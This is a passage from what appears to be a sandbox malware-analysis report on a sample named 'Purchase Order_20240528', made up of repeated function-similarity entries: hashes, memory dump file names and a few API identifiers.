                                  • Opcode Fuzzy Hash: 5643d78a9edf4cfcfa5c038a40d2f6a39e85c601527b28e8c43b735ac9e396a4
                                  • Instruction Fuzzy Hash: E2012171E1061AEBDB04DFA9D851AAEB7F8FF58344F10805AF904EB351D6749901CBA4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                  • Instruction ID: 59ac34dcca99d6b7188cea4a307ec46086d97d09539b3bc68e78c74199e16248
                                  • Opcode Fuzzy Hash: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                  • Instruction Fuzzy Hash: 9C012171E01219EBDB04DFA9D841A9EBBF8FF58304F50405AE914EB390D674D901CBA4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction ID: 3e8a209863417396007c268404d50e3b97897da3518b7e7461075124d52acb2b
                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction Fuzzy Hash: 8901AD322416859BE323971ECD05B59BF9CEF81750F0C40A9FE448BBA1D769C801C210
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aaa2e968b3a877b33a5a85f4fc37b0f387cce358cbbda1c376ca1a37b60a7166
                                  • Instruction ID: 641ccf23b8454e0dea8cb3b318f6b13d4818faac8db5654345bccae4abafa6ac
                                  • Opcode Fuzzy Hash: aaa2e968b3a877b33a5a85f4fc37b0f387cce358cbbda1c376ca1a37b60a7166
                                  • Instruction Fuzzy Hash: BAE08C325004A26BC715FA5DDD10F5A739EFFE4260F010225F1509B294CA60AC00CB94
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: a09c7fb4e6971bc2e8e38d78bfd5fee3cf6c22fdb9e3cc3251281507ebb89d7d
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: A8D05E36511A50AFD7329F1BEE00D13BBF9FFC4A10706062EA54683A20C770A806CBA0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: 766049fc81cada3f5d91fe573cf22b5a0fb0660bea33d6d8a2c11b6d1adefe63
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: 53D0A932224621ABEBB2AA1CFC00FC333E8BB88760F060459B008CB150C360AC81CA84
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: 8ef0358931afe653d53acdcb0bd49f1cecca014ecc0b769e6279cd92c6774265
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 04E08C319106819BDF52DF59CA40F4AFBF4FB94B00F150008A5085F220C325A900CB40
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: 504a394419a104a942ba5eab7a8333add069a316daa540d12198b2b8d7b3fe24
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 62D0223322203293DF3856A9A810F676905BFC0A90F0A002C350A9B800C1048C82C3E0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction ID: 798e8c81ec44bc26c496deb17967500828e16304db8f93909bebe8adc5ea8c88
                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction Fuzzy Hash: AFD012371E054EBBDB119F66DC01F957BA9FBA4BA0F454020B6048B5A0C63AE950D584
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 348308bef9444335ad99a62b811e2e4f0f73634fc4d4b8424ec94ef53543c4cf
                                  • Instruction ID: b4d7f9978e32f760cec3a451aec4b5b22cff47f0780e4532383b53c40fd0865f
                                  • Opcode Fuzzy Hash: 348308bef9444335ad99a62b811e2e4f0f73634fc4d4b8424ec94ef53543c4cf
                                  • Instruction Fuzzy Hash: 28D0A731556002CBDF57CF09CD20E2E3A74FF14740F44106CEF4052520D324DC11C600
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: 000f776f535c293b046aebd0ec9fb8e7d36f8cccdbbaacdb5a6b7828db83fbec
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 98D0C939252E80CFD71BCB0CC9A4B1933A4FB44B44F890494F501CBB62DA2CD940CA10
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 00aea43265b15c1d24e29dc3099becf0ed9bb358da58be98ed359fe7a38a2712
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: DBC012322A0649AFDB12AA99CD01F027BA9FBA8B40F010021F3048B670C631E820EA84
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: 59a413a418a8948ab208ce73ccf4cdeb63a4da1bf0b787193427964c2212f447
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: 4DD01236100249EFCB06DF41C890E9B772BFBD8750F108019FD1907650CA31ED62DA50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: 6c336e55a331adbd0f7de78626de7151f10e46f4c7f22d14132f9dfc356fd1a2
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: 04C04879701A428FDF16DB2AD694F4977E4FB94780F151890E905CBB22E724E801CA20
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24f8f2fe1517a8a1385a1e3e263487d9258d6fdd81561b80d930ae0fd66e03fd
                                  • Instruction ID: 7e1b898d788f818832c5abbf37a13e93fd04308b17df047c2942f96694e16d8c
                                  • Opcode Fuzzy Hash: 24f8f2fe1517a8a1385a1e3e263487d9258d6fdd81561b80d930ae0fd66e03fd
                                  • Instruction Fuzzy Hash: 0A900231A0580012914075584C845874019A7E0301B55C111F4428654DCA148A576361
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4d28ce3ba5d4a20c27670f86d174096c8083df4b05e7ae371fa6f3298c03f41
                                  • Instruction ID: 725f4271369b65f3cc37bed8a8cda3f6f83cc453420c853fc12b5d2cd36f2268
                                  • Opcode Fuzzy Hash: d4d28ce3ba5d4a20c27670f86d174096c8083df4b05e7ae371fa6f3298c03f41
                                  • Instruction Fuzzy Hash: FB900261A0150042414075584C044476019A7E1301395C215B4558660DC6188956A369
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4eb3be20b9243b52930b52faafc3462db28d5fbf4e80b3d286568c00e10f5801
                                  • Instruction ID: 1159db235640ac98f4e9d1ddd1a1108f23695ee711291f242311c31b103996f1
                                  • Opcode Fuzzy Hash: 4eb3be20b9243b52930b52faafc3462db28d5fbf4e80b3d286568c00e10f5801
                                  • Instruction Fuzzy Hash: B890023160544842D14075584804A87002997D0305F55C111B4068794ED6258E56B761
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27b8a40c44056aaaea340e6fbaa86d92b735123e8aaf1dc5763e7f03c345d032
                                  • Instruction ID: 582780dc4cbe9027a3cfcc94bfa719023b3f358872e2e4f63cd469382d794646
                                  • Opcode Fuzzy Hash: 27b8a40c44056aaaea340e6fbaa86d92b735123e8aaf1dc5763e7f03c345d032
                                  • Instruction Fuzzy Hash: 8890023160140802D1807558480468B001997D1301F95C115B4029754ECA158B5A77A1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e08539872ef7fb56abaf9f1799c797a184622e762fabbf953c617a85ff123abf
                                  • Instruction ID: bafddcc67570bddb99f47d98d03263116fcf627a32c8f1a4a78dfce8c7d53337
                                  • Opcode Fuzzy Hash: e08539872ef7fb56abaf9f1799c797a184622e762fabbf953c617a85ff123abf
                                  • Instruction Fuzzy Hash: FE900231A0540802D15075584814787001997D0301F55C111B4028754EC7558B5677A1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8df28d99798126962fbb3b16d3e31ec9e20259b8fc86e8e34fb1631ce5a1a1e7
                                  • Instruction ID: 4ce90f233dfa97549dc463fdd13c54a813f96a76a4b804871d8f16f78971c4c3
                                  • Opcode Fuzzy Hash: 8df28d99798126962fbb3b16d3e31ec9e20259b8fc86e8e34fb1631ce5a1a1e7
                                  • Instruction Fuzzy Hash: 1990023160140802D10475584C046C7001997D0301F55C111BA028755FD66589927231
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fd83bedb9c482c17bd871f7d7795df464648aae3eaa07fa7e24108c176ac3ca
                                  • Instruction ID: a82279eaef2d5856c494d71b4466d99d626a5478ee916a83462166739dda2116
                                  • Opcode Fuzzy Hash: 6fd83bedb9c482c17bd871f7d7795df464648aae3eaa07fa7e24108c176ac3ca
                                  • Instruction Fuzzy Hash: D6900225621400020145B9580A0454B0459A7D6351395C115F541A690DC62189666321
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c052e1d47165896875402f43dafe319e107ea026f194ca7f28a563df4716d6ce
                                  • Instruction ID: 3fffe49c1c3974feff603bda7669d947b01112b311e8fd06bf8a87a8e1d679ca
                                  • Opcode Fuzzy Hash: c052e1d47165896875402f43dafe319e107ea026f194ca7f28a563df4716d6ce
                                  • Instruction Fuzzy Hash: F9900225611400030105B9580B04547005A97D5351355C121F5019650DD62189626221
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                  • Instruction ID: 371701308864b20497b3d9984e89a382189ef63d1f2ec91701451150d00d4faf
                                  • Opcode Fuzzy Hash: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                  • Instruction Fuzzy Hash: C990023160240142954076585C04A8F411997E1302B95D515B4019654DC91489626321
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: c7d9afe136069f0c68253de7c04ef4060bfab72a4479e3710ef4d3ba6b94f280
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                  • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                                  • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                  • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                  • Instruction ID: 31a1762dbe1b06c98a7039b48fca7285e93d9210d66678904d50acd939e9a3e2
